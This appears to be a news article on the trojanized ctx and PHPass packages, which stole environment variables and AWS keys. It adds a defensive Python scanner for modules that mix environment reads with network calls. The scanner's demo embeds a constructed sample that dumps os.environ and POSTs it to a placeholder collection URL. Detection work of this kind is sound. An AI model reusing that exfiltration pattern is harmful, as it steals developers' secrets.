Python repositories are where teams developing in Python share code artifacts such as libraries and packages. The Python Package Index (PyPI) is a vast repository of open-source Python packages supplied by the worldwide community of Python developers; anyone can upload packages to it, and anyone can download them.
Two trojanized packages, one Python and one PHP, have been uncovered in yet another software supply chain attack targeting the open-source ecosystem. The PyPI module ctx, which reportedly has millions of downloads in total and around 20,000 a week, was compromised with malicious versions that steal the developer's environment variables. Likewise, versions of phpass, a package with millions of downloads published to the PHP/Composer package repository Packagist, were altered in the same way.
Public open-source repositories such as Maven, npm, Packagist, PyPI, and RubyGems are a critical part of the software supply chain that many organizations rely on to build applications. Recently, someone replaced the safe "ctx" code with a version that steals developer environment variables, collecting secrets such as Amazon AWS keys and credentials. The ctx package, now removed from PyPI, is a Python library for accessing Python dictionaries using dot notation.
ctx is a minimal Python module that lets developers manipulate dictionary objects in a variety of ways. Although popular, the package had not been touched by its developer since 2014, as BleepingComputer observed. After eight years without a release, the module was suddenly updated with malicious code, as spotted by Reddit users and later confirmed by ethical hackers. A long-dormant dependency that abruptly ships a new version is itself a signal worth alerting on before the update is pulled into a build.
PHPass, on the other hand, is an open-source password hashing framework for PHP applications that has been downloaded more than two million times. BleepingComputer also observed malicious commits made to the PHPass project this week that similarly steal environment variables.
The damage done via PHPass was far more limited, researchers added. The presence of identical logic and Heroku endpoints within the PyPI and PHP packages indicates that a common threat actor was responsible for both hijacks, and researchers say the attacker's identity is obvious. Within PHPass, the altered 'PasswordHash.php' file specifically looks for the 'AWS_ACCESS_KEY' and 'AWS_SECRET_KEY' values in the environment; these secrets are then uploaded to the same Heroku endpoint.
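The behaviour shared by both payloads, reading environment variables in a module that also has outbound HTTP, is cheap to look for during a dependency audit. The scanner below is an added example written for this page, not code from ctx, PHPass or the researchers who reported them; the two sample modules are constructed for the demo and the collection URL is a placeholder, not the real Heroku endpoint.

```python
"""Triage heuristic: flag Python modules that read os.environ/os.getenv *and*
make network calls or embed URLs.  Added example, not code from any project
named in the article.  Sample sources below are constructed; the URL is a
placeholder."""
import ast
import re
from dataclasses import dataclass, field

NET_MODULES = {"requests", "urllib", "http", "socket", "httpx"}
SECRET_HINTS = ("AWS_", "SECRET", "TOKEN", "KEY", "PASSWORD")
ENV_NAME_RE = re.compile(r"[A-Z][A-Z0-9_]+")   # looks like an env-var name


@dataclass
class Finding:
    env_reads: list = field(default_factory=list)     # line numbers touching the environment
    net_calls: list = field(default_factory=list)     # (lineno, dotted call name)
    urls: list = field(default_factory=list)          # (lineno, literal URL)
    secret_names: list = field(default_factory=list)  # env-var-like literals with secret hints

    @property
    def suspicious(self) -> bool:
        # Env reads alone are ordinary config handling; env reads plus egress
        # in one module is the pattern both payloads used.
        return bool(self.env_reads) and bool(self.net_calls or self.urls)


def _dotted(node: ast.AST) -> str:
    """Render a Name/Attribute chain such as os.environ.items as 'os.environ.items'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""


def scan_source(src: str) -> Finding:
    """Single AST walk collecting env access, network calls, URL and secret-name literals."""
    f = Finding()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, (ast.Attribute, ast.Name)):
            if _dotted(node) in ("os.environ", "environ"):   # also catches os.environ.items()
                f.env_reads.append(node.lineno)
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in ("os.getenv", "getenv"):
                f.env_reads.append(node.lineno)
            elif name.split(".")[0] in NET_MODULES:
                f.net_calls.append((node.lineno, name))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            v = node.value
            if v.startswith(("http://", "https://")):
                f.urls.append((node.lineno, v))
            elif ENV_NAME_RE.fullmatch(v) and any(h in v for h in SECRET_HINTS):
                f.secret_names.append(v)
    f.env_reads = sorted(set(f.env_reads))
    return f


def scan_distribution(name: str) -> dict:
    """Scan every .py file of an installed distribution, e.g. scan_distribution("ctx")."""
    from importlib.metadata import distribution
    flagged = {}
    for p in distribution(name).files or []:
        if p.suffix != ".py":
            continue
        try:
            finding = scan_source(p.locate().read_text(encoding="utf-8", errors="replace"))
        except SyntaxError:
            continue
        if finding.suspicious:
            flagged[str(p)] = finding
    return flagged


# Constructed sample: reads configuration from the environment, never phones home.
BENIGN_MODULE = '''
import os
DEBUG = os.getenv("DEBUG", "0") == "1"

def get_path(d, path):
    for part in path.split("."):
        d = d[part]
    return d
'''

# Constructed sample mirroring the described behaviour: dump the environment,
# pick out an AWS key and POST it out.  Placeholder URL, not the real endpoint.
TROJANIZED_MODULE = '''
import os, requests

def _report():
    data = dict(os.environ.items())
    data["aws"] = os.environ.get("AWS_ACCESS_KEY")
    requests.post("https://example.invalid/collect", json=data)

_report()
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_MODULE), ("trojanized", TROJANIZED_MODULE)):
        r = scan_source(src)
        print(f"{label}: suspicious={r.suspicious} env_lines={r.env_reads} "
              f"net={r.net_calls} secrets={r.secret_names}")
```

This is a triage heuristic, not a verdict: legitimate SDKs also read credentials from the environment and call APIs, so a hit should trigger a diff of the new release against the last known-good version rather than an automatic block. The PHP case would be handled the same way, looking for getenv()/$_ENV near curl_exec() or file_get_contents() in a file that previously had neither.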
However, this could have been a proof-of-concept exercise gone wrong, and until more information comes to light it would be irresponsible to name the person behind the ctx and PHPass hijacks. Researchers refer to this class of attack as repo jacking: an obscure supply chain vulnerability, conceptually similar to subdomain takeover, that impacts over 70,000 open-source projects and affects everything from web frameworks to cryptocurrencies.
Following these attacks, GitHub mandated two-factor authentication for maintainers of the top 100 npm packages and announced further security improvements. The continuing pattern of threat actors and bug bounty hunters finding novel ways to infiltrate the software supply chain could well prompt the administrators of other package repositories to introduce similar measures.
Disclaimer: Analytics Insight does not provide financial advice or guidance. Also note that the cryptocurrencies mentioned/listed on the website could potentially be scams, i.e. designed to induce you to invest financial resources that may be lost forever and not be recoverable once investments are made. You are responsible for conducting your own research (DYOR) before making any investments.